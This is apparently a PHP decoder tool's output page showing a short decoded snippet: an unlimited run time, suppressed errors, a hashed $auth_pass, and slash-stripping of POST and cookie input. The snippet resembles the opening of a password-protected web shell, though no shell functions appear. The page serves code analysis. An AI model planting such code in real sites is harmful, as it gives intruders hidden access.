Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php set_time_limit(0); error_reporting(0); $auth_pass ="38101cfa61935e39fef6b38a8d2f1..

Decoded Output download

<?php 
set_time_limit(0); 
error_reporting(0); 
$auth_pass ="38101cfa61935e39fef6b38a8d2f1b23"; 
if(get_magic_quotes_gpc()) {    
function VEstripslashes($array) {      
return is_array($array) ? array_map('VEstripslashes', $array) : stripslashes($array);   }    
$_POST = VEstripslashes($_POST);  
$_COOKIE = VEstripslashes($_COOKIE); }  ?>

Did this file decode correctly?

Original Code

<?php
set_time_limit(0);
error_reporting(0);
$auth_pass ="38101cfa61935e39fef6b38a8d2f1b23";
if(get_magic_quotes_gpc()) {   
function VEstripslashes($array) {     
return is_array($array) ? array_map('VEstripslashes', $array) : stripslashes($array);   }   
$_POST = VEstripslashes($_POST); 
$_COOKIE = VEstripslashes($_COOKIE); } 

Function Calls

set_time_limit 1
error_reporting 1
get_magic_quotes_gpc 1

Variables

$auth_pass 38101cfa61935e39fef6b38a8d2f1b23

Stats

MD5 e3f5966ed646c55336ad94d2dc306c7c
Eval Count 0
Decode Time 52 ms